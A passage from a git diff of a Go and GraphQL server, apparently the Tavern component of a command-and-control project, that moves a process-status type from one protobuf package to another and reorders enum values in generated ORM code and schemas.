"realm.pub/tavern/internal/ent/task" @@ -134,8 +134,8 @@ func (hpc *HostProcessCreate) SetNillableCwd(s *string) *HostProcessCreate { } // SetStatus sets the "status" field. -func (hpc *HostProcessCreate) SetStatus(cs c2pb.Process_Status) *HostProcessCreate { - hpc.mutation.SetStatus(cs) +func (hpc *HostProcessCreate) SetStatus(es epb.Process_Status) *HostProcessCreate { + hpc.mutation.SetStatus(es) return hpc } @@ -547,7 +547,7 @@ func (u *HostProcessUpsert) ClearCwd() *HostProcessUpsert { } // SetStatus sets the "status" field. -func (u *HostProcessUpsert) SetStatus(v c2pb.Process_Status) *HostProcessUpsert { +func (u *HostProcessUpsert) SetStatus(v epb.Process_Status) *HostProcessUpsert { u.Set(hostprocess.FieldStatus, v) return u } @@ -772,7 +772,7 @@ func (u *HostProcessUpsertOne) ClearCwd() *HostProcessUpsertOne { } // SetStatus sets the "status" field. -func (u *HostProcessUpsertOne) SetStatus(v c2pb.Process_Status) *HostProcessUpsertOne { +func (u *HostProcessUpsertOne) SetStatus(v epb.Process_Status) *HostProcessUpsertOne { return u.Update(func(s *HostProcessUpsert) { s.SetStatus(v) }) @@ -1165,7 +1165,7 @@ func (u *HostProcessUpsertBulk) ClearCwd() *HostProcessUpsertBulk { } // SetStatus sets the "status" field. 
-func (u *HostProcessUpsertBulk) SetStatus(v c2pb.Process_Status) *HostProcessUpsertBulk { +func (u *HostProcessUpsertBulk) SetStatus(v epb.Process_Status) *HostProcessUpsertBulk { return u.Update(func(s *HostProcessUpsert) { s.SetStatus(v) }) diff --git a/tavern/internal/ent/hostprocess_update.go b/tavern/internal/ent/hostprocess_update.go index ae271a9df..4ff17eeab 100644 --- a/tavern/internal/ent/hostprocess_update.go +++ b/tavern/internal/ent/hostprocess_update.go @@ -11,7 +11,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/predicate" @@ -156,8 +156,8 @@ func (hpu *HostProcessUpdate) ClearCwd() *HostProcessUpdate { } // SetStatus sets the "status" field. -func (hpu *HostProcessUpdate) SetStatus(cs c2pb.Process_Status) *HostProcessUpdate { - hpu.mutation.SetStatus(cs) +func (hpu *HostProcessUpdate) SetStatus(es epb.Process_Status) *HostProcessUpdate { + hpu.mutation.SetStatus(es) return hpu } @@ -520,8 +520,8 @@ func (hpuo *HostProcessUpdateOne) ClearCwd() *HostProcessUpdateOne { } // SetStatus sets the "status" field. -func (hpuo *HostProcessUpdateOne) SetStatus(cs c2pb.Process_Status) *HostProcessUpdateOne { - hpuo.mutation.SetStatus(cs) +func (hpuo *HostProcessUpdateOne) SetStatus(es epb.Process_Status) *HostProcessUpdateOne { + hpuo.mutation.SetStatus(es) return hpuo } diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index 2134af139..38208e395 100644 --- a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -59,7 +59,7 @@ var ( {Name: "identifier", Type: field.TypeString, Unique: true}, {Name: "name", Type: field.TypeString, Nullable: true}, {Name: "primary_ip", Type: field.TypeString, Nullable: true}, - {Name: "platform", Type: field.TypeEnum, Enums: []string{"PLATFORM_BSD", "PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS"}}, + {Name: "platform", Type: field.TypeEnum, Enums: []string{"PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS", "PLATFORM_BSD"}}, {Name: "last_seen_at", Type: field.TypeTime, Nullable: true}, } // HostsTable holds the schema information for the "hosts" table. 
@@ -123,7 +123,7 @@ var ( {Name: "cmd", Type: field.TypeString, Nullable: true}, {Name: "env", Type: field.TypeString, Nullable: true}, {Name: "cwd", Type: field.TypeString, Nullable: true}, - {Name: "status", Type: field.TypeEnum, Enums: []string{"STATUS_STOP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_UNKNOWN", "STATUS_IDLE", "STATUS_SLEEP", "STATUS_WAKING", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_LOCK_BLOCKED", "STATUS_DEAD", "STATUS_ZOMBIE", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_RUN"}}, + {Name: "status", Type: field.TypeEnum, Enums: []string{"STATUS_IDLE", "STATUS_STOP", "STATUS_ZOMBIE", "STATUS_LOCK_BLOCKED", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_RUN", "STATUS_DEAD", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_UNKNOWN", "STATUS_SLEEP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_WAKING"}}, {Name: "host_processes", Type: field.TypeInt, Nullable: true}, {Name: "host_process_host", Type: field.TypeInt}, {Name: "task_reported_processes", Type: field.TypeInt}, diff --git a/tavern/internal/ent/mutation.go b/tavern/internal/ent/mutation.go index fbd262586..e451cd5e3 100644 --- a/tavern/internal/ent/mutation.go +++ b/tavern/internal/ent/mutation.go @@ -12,6 +12,7 @@ import ( "entgo.io/ent" "entgo.io/ent/dialect/sql" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/file" "realm.pub/tavern/internal/ent/host" @@ -3831,7 +3832,7 @@ type HostProcessMutation struct { cmd *string env *string cwd *string - status *c2pb.Process_Status + status *epb.Process_Status clearedFields map[string]struct{} host *int clearedhost bool @@ -4393,12 +4394,12 @@ func (m *HostProcessMutation) ResetCwd() { } // SetStatus sets the "status" field. -func (m *HostProcessMutation) SetStatus(cs c2pb.Process_Status) { - m.status = &cs +func (m *HostProcessMutation) SetStatus(es epb.Process_Status) { + m.status = &es } // Status returns the value of the "status" field in the mutation. -func (m *HostProcessMutation) Status() (r c2pb.Process_Status, exists bool) { +func (m *HostProcessMutation) Status() (r epb.Process_Status, exists bool) { v := m.status if v == nil { return @@ -4409,7 +4410,7 @@ func (m *HostProcessMutation) Status() (r c2pb.Process_Status, exists bool) { // OldStatus returns the old "status" field's value of the HostProcess entity. // If the HostProcess object wasn't provided to the builder, the object is fetched from the database. // An error is returned if the mutation operation is not UpdateOne, or the database query fails. 
-func (m *HostProcessMutation) OldStatus(ctx context.Context) (v c2pb.Process_Status, err error) { +func (m *HostProcessMutation) OldStatus(ctx context.Context) (v epb.Process_Status, err error) { if !m.op.Is(OpUpdateOne) { return v, errors.New("OldStatus is only allowed on UpdateOne operations") } @@ -4715,7 +4716,7 @@ func (m *HostProcessMutation) SetField(name string, value ent.Value) error { m.SetCwd(v) return nil case hostprocess.FieldStatus: - v, ok := value.(c2pb.Process_Status) + v, ok := value.(epb.Process_Status) if !ok { return fmt.Errorf("unexpected type %T for field %s", value, name) } diff --git a/tavern/internal/ent/schema/host_process.go b/tavern/internal/ent/schema/host_process.go index 83889db51..d784cd873 100644 --- a/tavern/internal/ent/schema/host_process.go +++ b/tavern/internal/ent/schema/host_process.go @@ -6,7 +6,7 @@ import ( "entgo.io/ent/schema" "entgo.io/ent/schema/edge" "entgo.io/ent/schema/field" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" ) // HostProcess holds the schema definition for the HostProcess entity. @@ -48,7 +48,7 @@ func (HostProcess) Fields() []ent.Field { Optional(). Comment("The current working directory for the process."), field.Enum("status"). - GoType(c2pb.Process_Status(0)). + GoType(epb.Process_Status(0)). Comment("Current process status."), } } diff --git a/tavern/internal/graphql/generated/ent.generated.go b/tavern/internal/graphql/generated/ent.generated.go index cf6c054b5..7c96ffb74 100644 --- a/tavern/internal/graphql/generated/ent.generated.go +++ b/tavern/internal/graphql/generated/ent.generated.go @@ -16,6 +16,7 @@ import ( "github.com/99designs/gqlgen/graphql/introspection" "github.com/vektah/gqlparser/v2/ast" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent" "realm.pub/tavern/internal/ent/tag" "realm.pub/tavern/internal/ent/tome" @@ -2755,9 +2756,9 @@ func (ec *executionContext) _HostProcess_status(ctx context.Context, field graph } return graphql.Null } - res := resTmp.(c2pb.Process_Status) + res := resTmp.(epb.Process_Status) fc.Result = res - return ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, field.Selections, res) + return ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, field.Selections, res) } func (ec *executionContext) fieldContext_HostProcess_status(ctx context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { @@ -10774,7 +10775,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("status")) - data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, v) if err != nil { return it, err } @@ -10783,7 +10784,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("statusNEQ")) - data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, v) if err != nil { return it, err } @@ -10792,7 +10793,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, 
graphql.NewPathWithField("statusIn")) - data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx, v) if err != nil { return it, err } @@ -10801,7 +10802,7 @@ func (ec *executionContext) unmarshalInputHostProcessWhereInput(ctx context.Cont var err error ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("statusNotIn")) - data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx, v) + data, err := ec.unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx, v) if err != nil { return it, err } @@ -17852,13 +17853,13 @@ func (ec *executionContext) marshalNHostProcessOrderField2ᚖrealmᚗpubᚋtaver return v } -func (ec *executionContext) unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, v interface{}) (c2pb.Process_Status, error) { - var res c2pb.Process_Status +func (ec *executionContext) unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, v interface{}) (epb.Process_Status, error) { + var res epb.Process_Status err := res.UnmarshalGQL(v) return res, graphql.ErrorOnPath(ctx, err) } -func (ec *executionContext) marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v c2pb.Process_Status) graphql.Marshaler { +func (ec *executionContext) marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v epb.Process_Status) graphql.Marshaler { return v } @@ -18750,7 +18751,7 @@ func (ec *executionContext) marshalOHostProcess2ᚕᚖrealmᚗpubᚋtavernᚋint return ret } -func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx context.Context, v interface{}) ([]c2pb.Process_Status, error) { +func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx context.Context, v interface{}) ([]epb.Process_Status, error) { if v == nil { return nil, nil } @@ -18759,10 +18760,10 @@ func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavern vSlice = graphql.CoerceList(v) } var err error - res := make([]c2pb.Process_Status, len(vSlice)) + res := make([]epb.Process_Status, len(vSlice)) for i := range vSlice { ctx := graphql.WithPathContext(ctx, graphql.NewPathWithIndex(i)) - res[i], err = ec.unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, vSlice[i]) + res[i], err = ec.unmarshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, vSlice[i]) if err != nil { return nil, err } @@ -18770,7 +18771,7 @@ func (ec *executionContext) unmarshalOHostProcessStatus2ᚕrealmᚗpubᚋtavern return res, nil } -func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Statusᚄ(ctx context.Context, sel ast.SelectionSet, v []c2pb.Process_Status) graphql.Marshaler { +func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Statusᚄ(ctx context.Context, sel ast.SelectionSet, v []epb.Process_Status) graphql.Marshaler { if v == nil { return graphql.Null } @@ -18797,7 +18798,7 @@ func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋ if !isLen1 { defer wg.Done() } - ret[i] = ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx, sel, v[i]) + 
ret[i] = ec.marshalNHostProcessStatus2realmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx, sel, v[i]) } if isLen1 { f(i) @@ -18817,16 +18818,16 @@ func (ec *executionContext) marshalOHostProcessStatus2ᚕrealmᚗpubᚋtavernᚋ return ret } -func (ec *executionContext) unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, v interface{}) (*c2pb.Process_Status, error) { +func (ec *executionContext) unmarshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, v interface{}) (*epb.Process_Status, error) { if v == nil { return nil, nil } - var res = new(c2pb.Process_Status) + var res = new(epb.Process_Status) err := res.UnmarshalGQL(v) return res, graphql.ErrorOnPath(ctx, err) } -func (ec *executionContext) marshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋc2pbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v *c2pb.Process_Status) graphql.Marshaler { +func (ec *executionContext) marshalOHostProcessStatus2ᚖrealmᚗpubᚋtavernᚋinternalᚋc2ᚋepbᚐProcess_Status(ctx context.Context, sel ast.SelectionSet, v *epb.Process_Status) graphql.Marshaler { if v == nil { return graphql.Null } diff --git a/tavern/internal/graphql/generated/root_.generated.go b/tavern/internal/graphql/generated/root_.generated.go index dcc444405..5f26b5627 100644 --- a/tavern/internal/graphql/generated/root_.generated.go +++ b/tavern/internal/graphql/generated/root_.generated.go @@ -1891,11 +1891,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -1942,21 +1942,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects. diff --git a/tavern/internal/graphql/gqlgen.yml b/tavern/internal/graphql/gqlgen.yml index 3deeb4ec7..e7faf746d 100644 --- a/tavern/internal/graphql/gqlgen.yml +++ b/tavern/internal/graphql/gqlgen.yml @@ -67,4 +67,4 @@ models: - realm.pub/tavern/internal/ent/tome.Tactic Status: model: - - realm.pub/tavern/internal/c2/c2pb.Process_Status + - realm.pub/tavern/internal/c2/epb.Process_Status diff --git a/tavern/internal/graphql/schema.graphql b/tavern/internal/graphql/schema.graphql index 243f87f31..2ccc51166 100644 --- a/tavern/internal/graphql/schema.graphql +++ b/tavern/internal/graphql/schema.graphql @@ -524,11 +524,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! 
@@ -575,21 +575,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects. diff --git a/tavern/internal/graphql/schema/ent.graphql b/tavern/internal/graphql/schema/ent.graphql index 56d217a48..4408ada07 100644 --- a/tavern/internal/graphql/schema/ent.graphql +++ b/tavern/internal/graphql/schema/ent.graphql @@ -519,11 +519,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -570,21 +570,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects. diff --git a/tavern/internal/www/schema.graphql b/tavern/internal/www/schema.graphql index 243f87f31..2ccc51166 100644 --- a/tavern/internal/www/schema.graphql +++ b/tavern/internal/www/schema.graphql @@ -524,11 +524,11 @@ enum HostOrderField { } """HostPlatform is enum for the field platform""" enum HostPlatform @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Host_Platform") { - PLATFORM_BSD PLATFORM_UNSPECIFIED PLATFORM_WINDOWS PLATFORM_LINUX PLATFORM_MACOS + PLATFORM_BSD } type HostProcess implements Node { id: ID! @@ -575,21 +575,21 @@ enum HostProcessOrderField { NAME } """HostProcessStatus is enum for the field status""" -enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/c2pb.Process_Status") { - STATUS_STOP - STATUS_TRACING - STATUS_WAKE_KILL - STATUS_UNKNOWN +enum HostProcessStatus @goModel(model: "realm.pub/tavern/internal/c2/epb.Process_Status") { STATUS_IDLE - STATUS_SLEEP - STATUS_WAKING + STATUS_STOP + STATUS_ZOMBIE + STATUS_LOCK_BLOCKED STATUS_UNSPECIFIED STATUS_PARKED - STATUS_LOCK_BLOCKED + STATUS_RUN STATUS_DEAD - STATUS_ZOMBIE STATUS_UNINTERUPTIBLE_DISK_SLEEP - STATUS_RUN + STATUS_UNKNOWN + STATUS_SLEEP + STATUS_TRACING + STATUS_WAKE_KILL + STATUS_WAKING } """ HostProcessWhereInput is used for filtering HostProcess objects.